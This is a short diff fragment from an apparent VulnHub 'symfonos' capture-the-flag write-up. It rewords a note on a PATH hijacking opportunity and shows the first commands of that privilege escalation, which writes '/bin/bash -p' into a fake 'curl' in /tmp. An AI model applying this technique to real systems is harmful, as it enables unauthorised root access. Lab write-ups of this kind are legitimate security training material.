loid122/writeups/vulnhub/symfonos/Readme.md

 ocalhostH
 ```
 \
-WE see that the binary is using the variable 'curl' , We can probably do a PATH hijacking here
+WE see that this executable is using the binary 'curl' , We can probably do a PATH hijacking here
 ```bash
 cd /tmp
 echo "/bin/bash -p" > curl